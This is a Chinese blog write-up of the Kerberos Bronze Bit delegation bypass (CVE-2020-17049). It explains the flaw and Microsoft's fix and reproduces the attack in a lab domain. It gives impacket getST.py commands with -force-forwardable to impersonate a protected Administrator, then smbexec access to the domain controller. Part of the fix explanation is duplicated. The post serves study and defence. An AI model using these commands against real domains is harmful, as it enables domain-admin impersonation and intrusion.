Kerberos Bronze Bit 漏洞

已于 2024-01-19 11:08:31 修改
阅读量147 收藏
点赞数
文章标签: kubernetes 容器 云原生
于 2023-08-11 09:40:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Innocence_0/article/details/132224449
版权

漏洞背景

Kerberos Bronze Bit (CVE-2020-17049)漏洞是国外安全公司Netspi 安全研究员 Jake Karnes
发现的一个Kerberos安全功能绕过漏洞。该漏洞存在的原因在于KDC在确定Kerberos服务票据是否可用于通过Kerberos的约束性委派时,其方式中存在一个安全功能绕过漏洞。利用此漏洞,一个被配置为使用约束性委派的遭入侵服务可以篡改一个对委派无效的服务票据,从而迫使KDC接受它。

该漏洞启用的攻击是Kerberos委派引起的其它已知攻击的扩展。该漏洞绕过了现有攻击路径的以下两个缓解措施,提高了它们的有效性和通用功能性。

  • 绕过了Protecd Users组内用户和设置了“敏感账号,不能被委派”的安全措施,导致了这些用户也可以被委派。

  • 绕过在设置约束性委派时勾选“仅使用Kerberos”选项,既无法进行协议转换。

漏洞原理

我们首先来看一下KDC在约束性委派和基于资源的约束性委派校验过程中对于通过S4u2Self
请求的ST如何进行验证,验证流程如图所示,KDC首先会检查通过S4u2Self请求的ST的forwardable标志位:

1)如果该为0,也就是不可转发,则会在验证是否是RBCD委派

  • 如果不是RBCD委派,则不返回票据

  • 如果是RBCD委派,则再检查被委派的用户是否设置了不能被委派

  • * 如果设置了,则不返回票据

  • * 如果没设置,则返回票据

图片.png

2) 如果该位为1,也就是可转发,则会再验证两者之间是否有委派配置。

  • 如果有委派配置,则返回票据

  • 如果无委派配置,则不返回票据

从图中的流程可以看出,对于约束性委派和基于资源的约束性委派,最后不返回票据的原因各不相同。但是,只要forwardable标志位为1,则约束性委派和基于资源的约束性委派在S4u2Proxy这一步均能获得票据。因此,我们后续的攻击就能成功。

如图所示TGS-
REP包,从中可以看出通过S4u2Self协议请求的ST是使用Service的Hash加密,且forwardable标志位不在已签名的PAC中,而我们又已知Service的Hash,因此我们可以使用Service的Hash解密Service的ST,然后将forwardable标志位设置为1,再重新加密,形成修改后的ServiceST。这一步不需要篡改PAC签名,并且KDC在验证PAC签名的时候也无法察觉到数据包被篡改。由于修改后的Service
ST 的 forwardable 标志位为 1 ,因此在S4u2Proxy 这一步就能获得票据。

图片.png

漏洞复现

实验环境如下:

  • 域控:DC(192.168.41.10)

  • 域管理员:Administrator

  • 服务账户:hack

  • 域:hack.com

1、约束性委派攻击绕过

首先我们注册一个服务账户,并对该服务账户配置约束性委派

net user hack Admin123 /add /domain 创建一个普通用户
setspn -U -A priv/test hack 注册为服务账号

图片.png

如图所示,已经配置好了服务账户hack对cifs/DC.hack.com具有约束性委派,但是由于选择了“仅使用Kerberos”选项,因此不能进行协议转换。

图片.png

如图所示设置域管理员Administrator为“敏感账户,不能被委派”。

图片.png

当我们使用常规的委派攻击命令时,提示如下的错误信息。

[-] Kerberos SessionError:KDC_ERR_BADOPTION(KDC cannot accommodate requested
option)
[-] Probably SPN is not allowed to delegate by user test or inital TGT not
forwardable

图片.png

但当我们加上 -force-forwardable 参数绕过时,则成功获取到票据,如图所示:

#以Administrator身份请求一张访问cifs/DC.hack.com的票据,加上 -force-forwardable 绕过参数
python3 getST.py -dc-ip 192.168.41.10 hack.com/hack:Admin123 -spn cifs/DC.hack.com -impersonate Administrator -force-forwardable

图片.png

#导入该票据
export KRB5CCNAME=Administrator.ccache

图片.png

#访问域控
python3 smbexec.py -no-pass -k DC.hack.com

图片.png

2、基于资源的约束性委派攻击绕过

首先设置域管理员Administrator为“敏感账户,不能被委派”,然后再域控上配置用户hack到krbtgt服务具有基于资源的约束性委派,命令如下:

Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount hack
Get-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount

图片.png

当我们使用常规的基于资源的约束性委派攻击命令时,会提示如下错误信息

图片.png

但当我们加上 -force-forwardable 参数时,则成功获取到票据,如图所示:

#以Administrator 身份请求一张访问Krbtgt服务的票据,加上-force-forwardable 绕过参数
python3 getST.py -dc-ip 192.168.41.10 -spn krbtgt -impersonate administrator hack.com/hack:Admin123 -force-forwardable
#导入该票据
export KRB5CCNAME=administrator.ccache

图片.png

#以Administrator身份访问域控DC.hack.com
python3 smbexec.py -no-pass -k administrator@DC.hack.com -dc-ip 192.168.41.10

图片.png

漏洞预防和修复

微软已经发布了该漏洞的补丁程序,可以直接通过Windows自动更新解决此问题。
那么该补丁是如何修复该漏洞的呢?微软在补丁包中新增加了一个票据签名。在S4u2Self阶段生成的服务票据,KDC用其密钥在票据上进行了签名,并将签名插入了PAC中,而后PAC又经过两次签名(使用服务密钥PAC_Server_CHECKSUM和使用KDC密钥PAC_PRIVSVR_CHECKSUM签名)。在之后的S4u2Proxy阶段,KDC才会返回票据,否则KDC将会返回KRB_AP_ERP_MODIFIED消息。这样,攻击者就无法修该数据包中的forwardable标志位了。

(使用服务密钥PAC_Server_CHECKSUM和使用KDC密钥PAC_PRIVSVR_CHECKSUM签名)。在之后的S4u2Proxy阶段,KDC才会返回票据,否则KDC将会返回KRB_AP_ERP_MODIFIED消息。这样,攻击者就无法修该数据包中的forwardable标志位了。

学习计划安排


我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

如果你对网络安全入门感兴趣,那么你需要的话可以

点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

程序员负总裁
关注
内网渗透(六十六)之Kerberos Bronze Bit 漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-12 597
Kerberos Bronze Bit (CVE-2020-17049)漏洞是国外安全公司Netspi 安全研究员 Jake Karnes 发现的一个Kerberos安全功能绕过漏洞。该漏洞存在的原因在于KDC在确定Kerberos服务票据是否可用于通过Kerberos的约束性委派时,其方式中存在一个安全功能绕过漏洞。利用此漏洞,一个被配置为使用约束性委派的遭入侵服务可以篡改一个对委派无效的服务票据,从而迫使KDC接受它。该漏洞启用的攻击是Kerberos委派引起的其它已知攻击的扩展。
此计算机必须为委派而被信任_实际利用Kerberos Bronze Bit漏洞绕过委派限制(CVE202017049)...
weixin_42350514的博客
01-08 489
0x00 前言本文主要说明如何针对Kerberos Bronze Bit漏洞(CVE-2020-17049)进行实际利用的过程。在阅读这篇文章之前,我强烈建议大家首先阅读《Bronze Bit攻击理论》这篇文章,以了解这种攻击的根本原因和攻击效果。值得关注的是,Microsoft在2020年11月10日发布了该漏洞的补丁程序。这个补丁程序的发布将持续到2021年2月9日。以下的攻击场景中...
CVE-2020-17049 Kerberos Bronze Bit 攻击
渗透测试研究中心
12-09 576
0x01 前言在getST.py(https://github.com/SecureAuthCorp/impacket/blob/master/examples/)中添加了一个新的PR-force-forwardable标识。启用该标识后,程序将执行以下步骤(新添加的内容以粗体显示):程序将使用通过-hash或-aesKey参数提供的密钥,获得一个TGT作为命令行指定的服务主体程序将通过其T...
Kerberos Bronze Bit Attack(CVE-2020-17049) 绕过复现
whojoe的博客
07-21 409
前言 前面说到可以通过设置 高权限用户没有在特殊要求之下设置为不可委派 为了防止凭据被盗微软推出了Protected Users组,适用于Windows Server 2016,Windows Server 2012 R2、 Windows Server 2012 这个就是绕过这个策略的方法 环境搭建 主机 机器名 ip 用户 密码 版本 域控 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 域内机器 user.tes
Kerberoskerberos认证常见错误介绍
热门推荐
wk022的专栏
01-19 5万+
本节按字母顺序 (A-M) 列出了 Kerberos 命令、Kerberos 守护进程、PAM 框架、GSS 接口、NFS 服务和 Kerberos 库的常见错误消息。 备注:下面这些错误有部分是通用的错误,所以解决方法并不一定适用所有场景,具体的解决方案是需要具体分析。不能一概而论。 All authentication systems disabled; connectio
委派相关利用
2301_79403927的博客
11-09 93
如下图:客户端想要访问,这个网站去下载一个文件,而文件在文件服务器上面,这时候客户端无法直接拿到这个文件,所以就委托HTTP服务器帮客户端把文件文件拿到,然后给客户端。这里提到了一个关键词是委托,说的简单点就是比如说自己手里有点事走不开,但是自己饿了,想吃饭,所以我把钱给我同事,并且委托我同事去帮忙买个饭,店里将饭做好之后交给我同事,然后我同事交给我。
三步轻松理解Kerberos协议
06-19
Kerberos协议是一种广泛应用于企业环境的身份验证协议,特别是在Active Directory (AD)域环境中,它为客户端和服务器应用提供了安全的认证服务。该协议的核心在于使用对称加密技术,确保了用户身份的安全验证,防止...
kerberos 客户端 for window 64
07-20
kerberos 客户端 for window 64位,安装配置教程见https://download.csdn.net/download/u013362877/10552816
pykek:Kerberos 漏洞利用工具包
07-08
Python Kerberos 漏洞利用工具包 PyKEK(Python Kerberos Exploitation Kit),一个用于操作 KRB5 相关数据的 Python 库。 (仍在开发中) 目前,仅实现了少数功能(以相当快速的方式)来利用 MS14-068 (CVE-2014-...
内网安全之:Kerberos 域用户提权漏洞(MS14-068;CVE-2014-6324)
f_carey的博客
12-08 1837
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Kerberos 域用户提权漏洞(MS14-068;CVE-2014-63241 pyKEK 工具包2 MSF 中 ms14_068 利用3 goldenPac.py4 防范 Kerberos MS14-068 漏洞 Microsoft Security Bulletin MS14-068 - Critical.
内网渗透--Kerberos协议详解
qq_62169455的博客
09-03 636
概述:Kerberos协议是一种网络认证协议,其设计目标是通过密钥系统为客户机/服务器应用程序提供强大的认证服务,该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意的读取、修改和插入数据。在以上的情况下,Kerberos作为一种可信任的第三方认证服务,是通过传统密码技术执行认证服务的。
滥用基于资源约束委派来攻击Active Directory
weixin_30530523的博客
03-15 466
0x00 前言 早在2018年3月前,我就开始了一场毫无意义的争论,以证明TrustedToAuthForDelegation属性是无意义的,并且可以在没有该属性的情况下实现“协议转换”。我相信,只要一旦启用约束委派(msDS-AllowedToDelegateTo不为空),它是否配置为使用“仅Kerberos”或“任何身份验证协议”并起作用。 我在Benjamin Delpy(@genti...
【安全】Kerberos相关问题进行故障排除| 常见错误和解决方法
九师兄
01-07 2万+
1.概述 转载 为了学习:Kerberos相关问题进行故障排除| 常见错误和解决方法 2.总结 可以用来帮助诊断Kerberos相关问题的原因并实施解决方案的指南。 3. 症状 单击症状链接转到相应的疑难解答部分。 2.1 Kerberos tgt javax.security.sasl.SaslException: GSS initiate failed [Caused by GSSException: No valid credentials provided (Mechanism level: F.
Kerberos 常见错误
zhm1002的博客
08-15 2647
本节按字母顺序 (A-M) 列出了 Kerberos 命令、Kerberos 守护进程、PAM 框架、GSS 接口、NFS 服务和 Kerberos 库的常见错误消息。 备注:下面这些错误有部分是通用的错误,所以解决方法并不一定适用所有场景,具体的解决方案是需要具体分析。不能一概而论。 All authentication systems disabled; connection refused 原因: 此版本的 rlogind 不支持任何验证机制。 解决方法: 请确保调用的 rlogin.
9.11-kubeadm方式安装k8s
最新发布
qq_70752758的博客
09-11 560
配置pod的yaml文件和docker-compose.uaml文件相似。
k8s防火墙networkPolicy,其他规则和端口规则ports的匹配顺序,进站策略ingress和出站策略egress中,ports规则的常用方法。
2401_84019227的博客
09-11 497
有了这个先后顺序,相对就容易理解其他规则和ports规则的匹配关系。看ip报文里面封装的TCP/UDP报文中的端口号。因为端口信息是在打开ip包之后才能看到的。如果不接收,就不会有检测端口号的操作,端口策略和其他策略的顺序关系是什么。ports这个策略,和前面三个不同。ingress.from进站策略中。如果要求,只能访问什么端口,就是与。而是说,能访问所有主机的什么端口。egress.to出站策略中。如果没有强调只能访问什么端口。B接收到数据包是先看ip。各个规则和端口号的关系。各个规则和端口号的关系。
【从问题中去学习k8s】k8s中的常见面试题(夯实理论基础)(二十九)
zerotoall的博客
09-11 364
思考一下问题: 97、您认为公司如何处理服务器及其安装? 考虑一家拼车公司希望通过同时扩展其平台来增加服务器数量。 您认为公司如何处理服务器及其安装? 参考答案:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值